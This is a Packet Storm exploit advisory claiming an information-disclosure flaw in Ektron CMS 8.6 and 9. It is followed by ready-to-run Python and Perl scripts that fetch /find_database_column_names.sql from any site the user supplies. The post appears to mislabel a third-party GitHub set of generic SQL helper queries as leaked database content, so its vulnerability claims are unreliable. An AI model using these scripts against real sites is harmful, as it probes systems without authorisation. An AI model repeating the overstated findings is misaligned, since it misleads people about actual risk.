Lucene search
KingSkrupellosPACKETSTORM:152341HistoryApr 02, 2019 - 12:00 a.m.
Ektron CMS 9 Database Disclosure
2019-04-0200:00:00
KingSkrupellos
packetstormsecurity.com
47
`###########################################################################
# Exploit Title : Ektron CMS 9 Database Disclosure Exploit
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 02/04/2019
# Vendor Homepage : ektron.com
episerver.com/products/platform/ektron/
# Software Download Link : github.com/whanrott/Ektron_sql_scripts/archive/master.zip
# Software Information Link : ektron.com/Products/Web-CMS/Web-Content-Management/
github.com/whanrott/Ektron_sql_scripts
cmsmatrix.org/matrix/cms-matrix/ektron-cms
# Software Affected Versions : 8.6 and 9
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
###########################################################################
# Description about Software :
***************************
Ektron Web Content Management System (CMS) is the platform of choice for more
than 3,700 global companies.
Episerver Digital Experience Cloud The only platform that puts Digital Content, Commerce
and Marketing in one screen.
Create, deploy, and manage enterprise-scale, global, personalized websites. Empower users,
designers, and developers to work in parallel, speeding time-to-web. Make content updates
directly on the site using an intuitive browser-based editor. Create site wireframes, ensuring global
brand consistency. Speed development using Ektron's Framework API, pre-built
.NET controls, and standard development tools like Microsoft Visual Studio.
###########################################################################
# Impact :
***********
* The product stores sensitive information in files or directories that are accessible
to actors outside of the intended control sphere.
* An information exposure is the intentional or unintentional disclosure of information
to an actor that is not explicitly authorized to have access to that information.
* This information is highly sensitive and should not be found on a production system.
Information :
*************
Ektron SQL Scripts :
Simple SQL scripts for examining the database of Ektron CMS v9.
Scripts
Script Name Purpose
find_all_users.sql
List all users with last login date
find_content_and_folder.sql
List all content, showing folder. Filter by multiple criteria
find_content_history.sql
Show content item history
find_database_column_names.sql
query the database structure to find matching tables and column names
find_folder_permissions.sql
List folder permissions
###########################################################################
Files :
*****
/find_all_users.sql
/find_content_alias_and_template.sql
/find_content_and_folder.sql
/find_content_history.sql
/find_database_column_names.sql
/find_folder_permissions.sql
/find_menu_items.sql
/find_meta_course_accreditation.sql
/find_meta_course_combinations.sql
/find_mismatched_content.sql
/where_is_this_content_used.sql
Information [ find_database_column_names.sql ]
*********************************************
/* look for table column names */
--USE <database name>;
SELECT
TABLE_NAME
,COLUMN_NAME
,DATA_TYPE
,CHARACTER_MAXIMUM_LENGTH
FROM
INFORMATION_SCHEMA.COLUMNS
WHERE
-- COLUMN_NAME LIKE '%%'
--AND TABLE_NAME LIKE '%_tbl'
--AND (TABLE_NAME LIKE '%%' OR COLUMN_NAME LIKE '%template%')
--AND
(
COLUMN_NAME LIKE '%%' OR TABLE_NAME LIKE '%%'
)
AND COLUMN_NAME LIKE '%%'
AND TABLE_NAME NOT LIKE '%_tracking'
ORDER BY
TABLE_NAME, COLUMN_NAME
;
###########################################################################
# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/find_database_column_names.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit
###########################################################################
# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('Ektron CMS V.9 Database Disclosure Exploit');
system('color a');
if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;
$File="find_database_column_names.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/find_database_column_names.sql");
if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/find_database_column_names.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}
###########################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###########################################################################
`